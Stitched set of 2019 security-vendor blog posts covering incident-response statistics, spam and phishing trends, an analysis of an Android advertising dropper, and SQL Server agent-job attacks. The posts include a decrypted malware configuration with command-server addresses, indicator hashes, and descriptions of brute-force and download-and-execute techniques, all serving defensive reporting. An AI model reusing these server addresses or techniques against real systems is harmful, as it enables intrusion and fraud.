The remote management interface of the RDP service was used in the initial attack vector in one out of three incidents. In the majority of cases, an adversary successfully obtained a valid user’s credentials as a result of a brute-force attack on the RDP service. Such an attack usually lasted just a few hours because weak or dictionary passwords were used. In addition, in most cases the same credentials were used for authentication in different systems, so an attacker was able to reuse the usernames and passwords to access additional hosts.

In one third of attacks through remote management interfaces, the valid credentials were known to the intruder in advance (no brute-force attempts were detected). They were probably obtained using social engineering methods or were found on unsecured resources with public access (for example, if an employee used the same password to register on third party resources).

Recommendations:

  • Restrict access to any remote management interfaces from external IP addresses. Remote control interfaces should be accessible only from a limited number of workstations. Use third-party solutions to enforce encryption (IPsec, stunnel).
  • Enforce a strict password policy for all IT systems.
  • Avoid using high-privileged accounts wherever possible: follow the principle of least privilege.
  • Consider deployment of two-factor authentication.

33% of attacks occurred due to a lack of security awareness among employees. An employee downloaded a malicious file from untrusted sources and launched it, allowing an adversary to gain control over the workstation. While it is impossible to completely eliminate human error, regular staff training on information security awareness can significantly reduce the success of attacks using social engineering methods.

Recommendations:

  • Use endpoint protection software on every host in the LAN and ensure it is regularly updated.
  • Use a ‘sandbox’ for analysis of every file downloaded from external resources.
  • Increase security awareness among employees, management and IT staff. This can be accomplished by regular security awareness sessions with periodic checks.

From a long-term perspective, the following strategies are recommended:

  • Implement patch management procedures that include centralized software updates on all hosts, including those that are not a part of the domain infrastructure.
  • Consider deploying a solution for network traffic analysis.
  • Automatically back up data to a device that is not writable thereafter.
  • Conduct regular security assessments of the IT infrastructure.
Attack duration

For a number of incidents, Kaspersky specialists have established the time period between the beginning of the attacker activity and the end of the attack. After analysis, all incidents were divided into three categories of attack duration.

Fast Attacks
(a few hours)
Medium Duration Attacks
(a few days)
Continuous Attacks
(three weeks and longer) This category includes attacks lasting less than 24 hours. These are mainly incidents involving ransomware attacks. Due to the high speed of development, effective countermeasures to such attacks are limited to preventive methods.
In some cases, a delay of up to a week has been observed between the initial compromise and the beginning of the attacker’s activity. This group includes attacks that have been developing for several days. In most cases, this activity was aimed at the direct theft of money. Typically, the attackers achieved their goals within a week. Incidents that lasted more than a few weeks were included in this group. This activity is almost always aimed at stealing sensitive data.
Such attacks are characterized by interchanging active and passive phases. Total duration of the active phases is, on average, similar to the duration of attacks in the previous group. Common threat:
Ransomware infection Common threat:
Financial theft Common threat:
Cyber-espionage and theft of confidential data Common attack vector:
Brute-force attack on RDP service Common attack vector:
Downloading a malicious file via link in email
Downloading a malicious file from infected site Common attack vector:
Downloading a malicious file via link in email Attack duration (median):
6 hours Attack duration (median):
8 days Attack duration (median):
3 months
Total duration of active phases (median):
7 days Countermeasures:
  • Strict password policy.
  • Two-factor authentication.
  • Restricted access to management interfaces.
  • Endpoint protection on every host in the LAN.
Countermeasures:
  • Staff security awareness.
  • Endpoint protection on every host in the LAN.
Countermeasures:
  • Comprehensive and timely investigation of each information security incident.
  • Use of infrastructure protection solutions at the network and workstation levels.
  • Use of network activity monitoring tools.
  • Correct internal network segmentation.
Attack tactics and techniques

For a number of incidents, a list of MITRE techniques was prepared. The ATT&CK table below shows the frequency with which techniques were observed in the investigated incidents. Unfortunately, not many companies are currently mature enough to gain value from the ATT&CK framework or common descriptions such as STIX. For those capable of ingesting this kind of information, make sure to highlight mentioned techniques in your security tools of choice.

Conclusion

From the statistics in this report, we can conclude that cyberattacks target all types of businesses around the globe. It means that having a plan to defend and quickly respond to such attacks is no longer an option; it’s a must, regardless of business type.

Maintaining and improving an already existing incident response plan will accelerate handling of security breaches through proper containment, analysis and eradication of infected elements in the network. The risk of re-infection is reduced and defense against complex attacks is improved by utilizing the lessons learned from each incident to enhance the existing security process in the environment.

Along with a powerful auditing policy and a log retention period of at least six months to one year, developing guided procedures for proper handling of digital evidence will definitely help in faster and more complete analysis of incidents by experts. This results in quicker containment and reduces possible loss of assets, data or reputation.

Frequent security assessments have proved effective in discovering weaknesses early enough to fix them and hardening overall infrastructure before adversaries reveal those weaknesses and make use of them in an offensive attack.

Furthermore, we can see that humans are still the weakest link in the security chain. Even with a high-level security policy and security controls in place, a single employee uneducated in information security can trigger a major compromise of the internal environment and assets.

2019. augusztus 28.

Spam and phishing in Q2 2019

Quarterly highlights Spam through Google services

In the second quarter of 2019, scammers were making active use of cloud-based data storage services such as Google Drive and Google Storage to hide their illegal content. The reasoning behind this is simple: a link from a legitimate domain is seen as more trustworthy by both users and spam filters. Most often, such links point to text files, tables, presentations, and other documents containing text and a link, say, to an advertised product or phishing page.

Also this past quarter, cybercriminals actively used Google Calendar to send out invitations to non-existent meetings, adding phishing links to fields filled out by the organizer.

Through Google Photos, fraudsters shared photos accompanied by a comment containing information about a money transfer and a contact email address. It’s a traditional scheme: before receiving the promised money, the victim is asked to pay some kind of “service fee”, whereupon the attackers vanish into thin air.

Google Forms, a tool for creating forms and surveys, was also actively used by cybercriminals to harvest users’ personal data and send commercial spam.

Bitcoin ransomware targets businesses

Until recently, the main blackmailing tool of cryptocurrency-hungry scammers was sextortion. However, their attention gradually began to switch from individual users to companies, which began to receive threats of reputational harm to their website.

Once more, it’s very straightforward. A request for the transfer of 0.3–0.5 bitcoin (around $4,200) is sent to the company’s public email addresses (or via its online feedback form). In case of refusal, the cybercriminals threaten to send abusive messages supposedly from the victim company through the contact forms of 13 million websites, as well as to mail out aggressive spam in the company’s name to 9 million email addresses. After that, they claim that the Spamhaus Project will recognize the victim’s website as a source of spam and block it forever.


Global sporting events

Major sporting events attract not only millions of fans, but also numerous scammers looking to exploit them. As such, in Q2 we detected a spam mailing timed to coincide with the 2019 UEFA Europa League Final in Baku. Recipients were asked to guess the winner of the match and earn the chance to win up to £200,000.

For this, they had to follow the link in the message, provide some personal data, and predict which team would win. The information collected could then be used for fraudulent attacks and more spam mailings. There’s also an extended version of this scheme: after some time, the victim receives a notification that their prediction was correct and their winnings are ready for collection — for which a small fee is required, naturally.

But scammers did not limit themselves to soccer fans. Q2 saw equally stellar golf and hockey tournaments in the shape of the Stanley Cup and the US Open.

Users were invited to watch broadcasts of these events, which, soon after starting, were blocked by a window prompting to set up an account:

On clicking the Create My Account button, a page opens asking to provide an email address and create a password:

However, on filling out all the fields and clicking the Continue button, the victim is required to verify the account, for which some more personal information is required — namely, bank card details.

The fraudsters report that the money will not be debited from the card, rather the payment data is needed simply for verification, since customers should supposedly be located in a country where the website is licensed to distribute such content. But even if you decide to undergo this “verification,” you won’t see the end of the match, of course. Instead, your data and payment information will be in the hands of the scammers.

Global TV and movie premieres

As we already wrote several times in past reports, fraudsters keep a close eye on world events and adapt their schemes to them. We found a ruse similar to the previous one, aimed at fans of the Marvel Cinematic Universe ahead of the release of the latest Avengers installment:

But Q2 wasn’t all about Avengers. It also witnessed the long-awaited premiere of the last season of Game of Thrones, and our statistics showed that the following week the number of scam resources mentioning the series increased fourfold against the month before the release. One of the most common fraudulent schemes was simulating the generation of codes for Game Of Thrones Conquest, a spin-off mobile game.

To get a code, the user had to fill out a form, specifying the number of coins that they would like to receive in the game.

After completing all the fields, the system goes into “code generation” mode. For the sake of authenticity, on-screen messages appear about connecting to servers and the like.

The generated code is not shown to the user until non-robot status is confirmed. This requires clicking a link and completing some kind of task.

At this point, the user might be asked to take a survey, play a lottery, provide details (phone number, postal address), subscribe to a paid SMS service, install adware (which redirects all user searches, harvests information about online activity, and resists deletion), or do something else. The nature of the task is determined by the partner network, one of whose sites the user is redirected to. The network, for its part, is selected based on the country of residence: it should match the regional language and local advertising laws.

The upshot is unpleasant, but predictable: the victim is either led around various partner sites until they tire of filling out forms and playing lotteries, or they are rewarded with a random set of symbols that has nothing to do with a genuine code and only mimics the format.

Tax refunds

The second quarter of the year sees the deadline for filing tax returns and tax refund applications in many countries. This is utilized by scammers who capitalize on users’ carelessness and fear of missing the deadline. Phishing emails are sent out saying that the user is entitled to a tax refund (large enough to arouse interest). The reason given for the rebate might be a standard law procedure or a system error.

Some mailings employ a well-known technique whereby the user is given a limited amount of time to take action. For instance, in an email seemingly from HMRC (Her Majesty’s Revenue and Customs, the UK tax service), victims had to follow the link and fill out the form immediately, while fake CRA (Canada Revenue Agency) letters were giving the recipient 24 hours, otherwise a tax refund would not be possible.

Phishing pages at the end of links in such messages are aimed at stealing various personal information: account passwords, answers to secret questions, names of close relatives, their dates of birth, full information about bank cards, including CVV code, and much more. In some examples, on clicking a link, a chain of actions had to be completed, such as entering basic information (name, social security number), followed by more detailed data, and then at the final step specifying bank card numbers.

Besides phishing links, scammers also sent malicious attachments. Cybercriminals tried to convince users to open them by citing errors in the return form that were in need of urgent correction. The malicious file, detected as Trojan-Downloader.MSOffice.SLoad.gen, was disguised as a copy of the return form. If the user gave permission to run the macro, another malicious executable was downloaded and launched.

Another bulk email attachment was detected as Trojan.Win32.Agentb.jofi, a multifunctional backdoor that provides remote access to the infected machine. Its capabilities include monitoring keystrokes, stealing passwords for browsers and Windows accounts, recording video from the computer’s webcam, and executing commands received from C&C servers.

Tourist phishing

In anticipation of the summer holidays, we registered an increase in the number of phishing mailings aimed at travelers. Everything was in play: Airbnb emails with accommodation offers at tempting prices, phishing sites mimicking Booking.com, fake travel sites, and so on.

Neither did attackers ignore airlines — both large international carriers and small local firms. For example, here’s a mailing we detected informing customers that their account has exceeded some kind of limit and requesting confirmation of account data within 24 hours.

Those who swallowed the bait and clicked the link were redirected to a fake site where they were prompted to fill out an “authorization” form. The data, of course, went straight to the attackers.

Messages in another scam mailing scheme looked like official ticket booking confirmations. The fraudsters used the same phishing link for the booking number and the “view details” option. However, instead of the promised data, the user was taken to a page specially set up to steal personal information.

Phishing emails supposedly from email services

The vast majority of scam emails aimed at stealing login credentials for email services imitate messages from the email services themselves. Scammers try to make their fake messages as believable as possible: the sender’s address is similar to the real one, the message uses the correct logos, and there are links to official resources as well as signatures.

The email text, the scammers also try to make convincing. It usually starts by reporting some kind of problem with the victim’s account, followed by a description of what needs to be done, which entails either following a link or opening an attachment. To intimidate the recipient further, mention is made of what can happen to the account in case of failure to perform the specified actions (deletion, suspension), with specific time frames.

Atypical examples are also encountered: the message might be disguised as business correspondence (usually such messages contain a malicious attachment), and the text may not mention email accounts at all. On clicking the link in such an email, the user is taken to a page where they are asked to enter email account details in order to view a (nonexistent) document.

Statistics: spam Proportion of spam in mail traffic

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Proportion of spam in global mail traffic, Q1 2019 – Q2 2019 (download)

In Q2 2019, the largest share of spam was recorded in May (58.71%). The average percentage of spam in global mail traffic was 57.64%, up 1.67 p.p. against the previous reporting period.

Proportion of spam in Runet mail traffic, Q1 2019 – Q2 2019 (download)

Peak portion of spam in traffic in the Russian segment of the Internet also came in May (57.56%). The average value for the quarter was 55.20%, which is 0.28 p.p. less than in the previous reporting period.

--> Sources of spam by country

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Sources of spam by country, Q2 2019 (download)

The top lines in the list of spam sources remain the same: in first place was China (23.72%), the US came second (13.89%), Russia remained third (4.83%), and Brazil took fourth (4.62%) — only the fifth line differs from last quarter: France (3.11%) pushed Germany out of the Top 5.

Spam email size

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Spam email size, Q1 and Q2 2019 (download)

In Q2 2019, the share of very small emails (up to 2 KB) in spam rose against Q1 by 13.33 p.p. to 87.31%. Meanwhile, the share of 5–10 KB messages fell by 4.52 p.p. to 2.27%. Messages 10–20 KB in size were fewer in numbers than most other ones: their share was 1.98%, down 3.13 p.p. on last quarter. The proportion of 20–50 KB messages amounted to 2.10%, versus 3% in the previous reporting period.

Malicious attachments, malware families

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of Mail Anti-Virus triggerings, Q1 2019 – Q2 2019 (download)

In Q2 2019, our security solutions detected a total of 43,907,840 malicious email attachments. May was the quarter’s hottest month with almost 16 million mail antivirus triggers, while April was the coolest (2 million fewer).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Top 10 malicious attachments in mail traffic, Q2 2019 (download)

In Q2, the malware Exploit.MSOffice.CVE-2017-11882.gen (7.53%) came first in terms of prevalence in mail traffic. In second position was Worm.Win32.WBVB.vam (4.24%), and Trojan.MSOffice.SAgent.gen (2.32%) took third.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Top 10 malware families in mail traffic, Q2 2019 (download)

Looking at malware families, we see a slightly different picture. In first place is the Andromeda bot family (8.00%), whose individual members took only fourth and sixth places in the malware Top 10. Close behind is the Exploit.MSOffice.CVE-2017-11882 family (7.64%), a set of exploits for the Microsoft Office suite. In third place is the Worm.Win32.WBVB family of worms (4.74%), written in Visual Basic.

Countries targeted by malicious mailshots

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Countries targeted by malicious mailshots, Q2 2019 (download)

Germany continues to occupy top spot by share of mail antivirus triggerings, posting 10.05% this quarter. Russia finished second (6.16%), nudging Vietnam (5.98%) into third.

Statistics: phishing

In Q2 2019, the Anti-Phishing system blocked 129,933,555 attempts to direct users to scam websites. 12.34% of all Kaspersky Lab users worldwide experienced an attack.

Attack geography

The country with the largest share of users attacked by phishers in Q2 2019 was Greece (26.20%), up from sixth place in the quarter before having added 10.34 p.p.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of phishing attacks, Q2 2019 (download)

Greece is followed by Venezuela (25.67%), which rose to second from fifth, adding 8.95 p.p. Brazil came in third (20.86%), falling from first place, despite losing less than 1 p.p. Australia (17.73%) failed to medal this time around, while Portugal (17.47%) rounds off the Top 5.

Country %* Greece 26.20% Venezuela 25.67% Brazil 20.86% Australia 17.73% Portugal 17.47% Spain 15.85% Algeria 15.51% Chile 15.47% France 14.81%

* Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country

Organizations under attack

The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab’s Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

This quarter, credit organizations retain first place by number of attacks — the share of attacks on banks amounted to 30.68%, which is almost 5 p.p. more than last quarter.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of organizations subjected to phishing attacks by category, Q2 2019 (download)

In second position was payment systems (20.12%), and global Internet portals (18.02%) took third place.

Conclusion

In Q2 2019, the average share of spam in global mail traffic fell by 1.67 p.p. to 57.64%, while the Anti-Phishing system prevented more than 130 million redirects to phishing sites, up 18 million on the previous reporting period.

First place in the list of spam sources went to China with a share of 23,72%. Top spot by number of mail antivirus detections was claimed by Germany on 10.05%. Throughout Q2 2019, our security solutions detected a total of 43,907,840 malicious email attachments. The most prevalent malware in mail traffic was Exploit.MSOffice.CVE-2017-11882.gen with a share of 7.53%, while Backdoor.Win32.Androm, with an 8% share, was the most common malicious family.

Cybercriminals continue to look for new ways to deliver spam and improve old ones. In Q2, they used popular Google services to distribute spam. Blackmailers are also trying out new methods. Alongside threats to ordinary users, attempts were made to blackmail companies by threatening to send spam mailings in their name.

Apart from that, as before, scammers are alive to the zeitgeist and quickly adapt their schemes to high-profile events.

2019. augusztus 27.

An advertising dropper in Google Play

Recently, the popular CamScanner – Phone PDF creator app caught our attention. According to Google Play, it has been installed more than 100 million times. The developers position it as a solution for scanning and managing digitized documents, but negative user reviews that have been left over the past month have indicated the presence of unwanted features.

After analyzing the app, we saw that the developer added an advertising library to it that contains a malicious dropper component. Previously, a similar module was often found in preinstalled malware on Chinese-made smartphones. It can be assumed that the reason why this malware was added was the app developers’ partnership with an unscrupulous advertiser.

Kaspersky Lab solutions detect this malicious component as Trojan-Dropper.AndroidOS.Necro.n. We reported to Google company about our findings, and the app was promptly removed from the Google Play.

Technical details about Necro.n

When the app is run, dropper decrypts and executes the malicious code contained in the mutter.zip file in the app resources.

Next, the configuration file with the name “comparison” is decrypted.

Once we decrypt it, we obtain the following configuration with the addresses of the attackers’ servers.

{ "hs": { "server": "https://abc.abcdserver[.]com:8888", "default": "https://bcd.abcdserver[.]com:9240", "dataevent": "http://cba.abcdserver[.]com:8888", "PluginServer": "https://bcd.abcdserver[.]com:9240" }, …. }

Dropper downloads an additional module from these URLs:

And then it executes its code:

The above-described Trojan-Dropper.AndroidOS.Necro.n functions carry out the main task of the malware: to download and launch a payload from malicious servers. As a result, the owners of the module can use an infected device to their benefit in any way they see fit, from showing the victim intrusive advertising to stealing money from their mobile account by charging paid subscriptions.

IOCs MD5
  • 7b7064d3876fc3cb1b3593e3c173a1a2
  • b6656bb8fdfb152f566723112b0fc7c8
  • d3ccb1b4feea5fee623fad5c5948b09b
  • 7186f405f82632f45ad51226720a45b5
  • 9d6439756af0686974ac9f920d56dd39
  • 10573004477fb4a405d41d6ee4dbdd64
  • e8d361827438873ae27ac5200f3f91be
  • 85c96e359dd48bb814e2ddf34bc964fa
  • cdf045f1d96fae53d3986b985d787b59
  • 9fbc7c3c3326bfc710f9b079766cf85c
  • 2087986583416f45ae411ebd8c5db8aa
  • a1b3551ec1dcdce7ac2655994697a02d
  • d0ae4282d629518458fb5ca765627a71
  • d28ec38edda65324299fc0dcddca9740
  • 2e9eef8b88bf942e416ed244a427d20c
  • 45fac5ad7be24f5110c5e77c2a7a42f6
  • 5d52373b32cbcfdfb25dd20d267b5186
  • 66db48ce2ff503a27cb9c1617e9a2583
  • bcbf463050a0706b008e21a846b3185e
  • 19c6604f18d963f0320d8ddee98a9fd0
  • 44196cbce4e57e60443a9c19281e532f
  • 1807f8d8e711fd12a6127455afe98e85
  • 3e3db74a1ee8da53f05b61dde65a95b3
  • 170646ee90094db9516ca4a054bf2804
  • da953233a618570336e2e5ddd6464e67
  • c69a2d2b0bf67265590c9be65cd4286b
  • 96db624fa2532d14dd43c7ad3124c385
  • d07846903cb78babac78f0dd789d262e
  • a02811248a0d316a1f99d07e60aa808e
  • 74709014aa553b92fe079cf8941d64f6
  • f8b8fd44952ca199d292570ff6da5e8f
  • 9eff49dc969eea829e984bad34b7225c
  • 5bf2d280557e426e90c086fb89dc401f
  • e7705517e9e469921652ad33f87d7c22
  • dbb53ee8229cf4e8ae569a443bcd59d3
  • 3d37fbbffc45b7ca11e20ed06cc2f0f6
  • ec11fb61eababc7586e1874c92f7629e
  • b5c7b67e9650bf819b70d2c0a5ca7c63
  • 7b7064d3876fc3cb1b3593e3c173a1a2
  • b6656bb8fdfb152f566723112b0fc7c8
  • d3ccb1b4feea5fee623fad5c5948b09b
  • 7186f405f82632f45ad51226720a45b5
  • 9d6439756af0686974ac9f920d56dd39
  • 10573004477fb4a405d41d6ee4dbdd64
  • e8d361827438873ae27ac5200f3f91be
  • 85c96e359dd48bb814e2ddf34bc964fa
  • cdf045f1d96fae53d3986b985d787b59
  • 9fbc7c3c3326bfc710f9b079766cf85c
  • 2087986583416f45ae411ebd8c5db8aa
  • a1b3551ec1dcdce7ac2655994697a02d
  • d0ae4282d629518458fb5ca765627a71
  • d28ec38edda65324299fc0dcddca9740
  • 2e9eef8b88bf942e416ed244a427d20c
  • 45fac5ad7be24f5110c5e77c2a7a42f6
  • 5d52373b32cbcfdfb25dd20d267b5186
  • 66db48ce2ff503a27cb9c1617e9a2583
  • bcbf463050a0706b008e21a846b3185e
  • 19c6604f18d963f0320d8ddee98a9fd0
  • 44196cbce4e57e60443a9c19281e532f
  • 1807f8d8e711fd12a6127455afe98e85
  • 3e3db74a1ee8da53f05b61dde65a95b3
  • 170646ee90094db9516ca4a054bf2804
  • da953233a618570336e2e5ddd6464e67
  • c69a2d2b0bf67265590c9be65cd4286b
C&C
  • https://abc.abcdserver[.]com:8888
  • https://bcd.abcdserver[.]com:9240
  • http://cba.abcdserver[.]com:8888
  • https://bcd.abcdserver[.]com:9240
2019. augusztus 22.

Agent 1433: remote attack on Microsoft SQL Server

All over the world companies large and small use Microsoft SQL Server for database management. Highly popular yet insufficiently protected, this DBMS is a target of choice for hacking. One of the most common attack on Microsoft SQL Server — the remote attack based on malicious jobs — has been around for a long time, but it is still used to get access to workstations through less-than-strong administrator password.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Attempted attacks geography from January through July 2019 (download)

According to our statistics, the majority of such attacks fall on Vietnam (>16%), Russia (~12%), India (~7%), China (~6%), Turkey and Brazil (5% each).

Attack description

Microsoft SQL Server attacks are normally massive in nature and have no particular target: the attackers scan sub-networks in search of a server with a weak password. The attack begins with a remote check of whether the system has MS SQL Server installed; next the intruders proceed to brute-force the account password to access the system. In addition to password brute-forcing, they may also resort to authorization via a user account token, authorized on a previously infected machine.

SQL Server authorization

As soon as penetration is accomplished, the attackers modify server configuration in order to access the command line. That done, they can covertly make the malware secure in the target system using jobs they had created for the SQL Server.

Examples of jobs

Job is a sequence of commands executed by SQL Server agent. It may comprise a broad range of actions, including launching SQL transactions, command line applications, Microsoft ActiveX scripts, Integration Services packages, Analysis Services commands and queries, as well as PowerShell scripts.

A job consists of steps, the code featured in each one being executed at certain intervals, allowing intruders to deliver malicious files to the target computer again and again, should they be deleted.

Below are a few examples of malicious queries:

  • Installing a malware download job using the standard ftp.exe utility:
  • Downloading malware from a remote resource using JavaScript:
  • Writing a malware file into the system followed by its execution:

We have analyzed the payloads delivered to the compromised machines via malicious jobs to learn that most of them were cryptocurrency miners and remote access backdoors. The less common ones included passwords capture and privilege escalation utilities. It should be mentioned, however, that the choice of payload depends on the attackers’ goals and capabilities and is by no means limited to the mentioned options.

To protect your machines from malicious job attacks, we recommend using robust, brute-force-proof passwords for your SQL Server accounts. It will also pay to check Agent SQL Server for third-party jobs.

Kaspersky Lab products return the following verdicts when detecting malware that installs malicious SQL Server jobs:

  • Trojan.Multi.GenAutorunSQL.a
  • HEUR:Backdoor.Win32.RedDust.gen
  • HEUR:Backdoor.MSIL.RedDust.gen

And use proactive detection using the System Watcher component:

  • PDM:Trojan.Win32.GenAutorunSqlAgentJobRun.*
  • PDM:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic
MD5
  • 6754FA8C783A947414CE6591D6FA8540
  • 91A12A4CF437589BA70B1687F5ACAD19
  • 98DFA71C361283C4A1509C42F212FB0D
  • A3F0B689C7CCFDFAEADD7CBBF1CD92B6
  • E2A34F1D48CE4BE330F194E8AEFE9A55
2019. augusztus 19.

IT threat evolution Q2 2019

Targeted attacks and malware campaigns More about ShadowHammer

In March, we published the results of our investigation into a sophisticated supply-chain attack involving the ASUS Live Update Utility, used to deliver BIOS, UEFI and software updates to ASUS laptops and desktops. The attackers added a backdoor to the utility and then distributed it to users through official channels.

ASUS was not the only company used by the attackers. Other targets included several gaming companies, a conglomerate holding company and a pharmaceutical company – all located in South Korea. Either the attackers had access to the source code of the victims’ projects or they injected malware at the time of project compilation – indicating that they had already compromised the networks of those companies.

Our analysis of the sophisticated backdoor deployed by the attackers revealed that it was an updated version of the ShadowPad backdoor used in supply-chain attacks that we reported in 2017. The newly updated version used by ShadowHammer follows the same principle as before. The backdoor unwraps multiple stages of code before activating a system of plugins responsible for bootstrapping the main malicious functionality. The attackers used at least two stages of C2 servers, where the first stage would provide the backdoor with an encrypted next-stage C2 domain. We also found that ShadowHammer reused algorithms used in multiple malware samples, including PlugX – a backdoor that is quite popular among Chinese-speaking hacker groups.

This supply-chain attack is a landmark in the cyberattack landscape, indicating that even reputable vendors may suffer from the compromise of digital certificates and raising concerns about the software development infrastructure of all other software companies. The attackers behind ShadowHammer were able to add a backdoor to developer tools and inject malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism. It’s important that software vendors add another line to their software build conveyor to check software for potential malware injection – even after the code has been digitally signed.

You can read more in our report.

The ongoing activities of Roaming Mantis

In February, we detected new activity of the Roaming Mantis threat actor. This group has evolved significantly in a short space of time. The activities of Roaming Mantis were first reported in 2017, when it targeted Android. Its distribution method was SMS and it concentrated on just one country – South Korea. Since then, the scope of the group’s activities have widened considerably. Roaming Mantis now supports 27 languages, targets iOS as well as Android and includes crypto-mining for PCs in its arsenal.

The key finding of our latest research is that Roaming Mantis continues to seek ways to compromise iOS devices. The group has even built a landing page for iOS users. When the victim visits this page, they see a pop-up message guiding them to the malicious iOS mobile config installation. Following installation of this mobile configuration, the phishing site automatically opens in a web browser and sends collected information from the device to the attackers’ server. This information includes DEVICE_PRODUCT, DEVICE_VERSION, UDID, ICCID, IMEI and MEID.

Our telemetry also uncovered a new wave of malicious APK files targeting Android devices. Our analysis has confirmed that this is a variant of the sagawa.apk Type A malware that was previously distributed via SMS in Japan. Roaming Mantis also continues the DNS manipulation it has used in earlier campaigns.

The countries most affected by this campaign are Russia, Japan, India, Bangladesh, Kazakhstan, Azerbaijan, Iran and Vietnam. We have detected this malware over 6,800 times for over 950 unique users during this period. However, we believe the scale of this attack wave is much bigger and that these numbers reflect only a small part of the campaign.

The muddy waters of Middle East APTs

In April, we provided an analysis of the tools used by the MuddyWater threat actor following initial infection of its targets. MuddyWater, which first surfaced in 2017, is an APT group that focuses on government bodies and telecommunications companies in the Middle East – Iraq, Saudi Arabia, Bahrain, Jordan, Turkey and Lebanon, and also a few other nearby countries – Azerbaijan, Pakistan and Afghanistan. The group uses an array of customized attack tools, mostly developed by the group itself using Python, C# and PowerShell, to compromise their victims and exfiltrate data.

MuddyWater also employs deceptive techniques to divert investigations once they have deployed attack tools inside a victim’s system, such as Chinese strings, Russian strings and impersonation of the ‘RXR Saudi Arabia’ hacking group.

This threat actor has expanded its targets and malware arsenal in recent years; and we expect the group to continue developing. However, while moderately sophisticated in terms of its tools, the group’s current OPSEC is poor, leaving details that could reveal different types of information about the attackers.

ScarCruft continues to evolve

We continue to track the activities of ScarCruft, a Korean-speaking and alleged state-sponsored threat actor that typically targets organizations with links to the Korean peninsula. This group, which has shown itself to be highly skilled and resourceful, continues to develop.

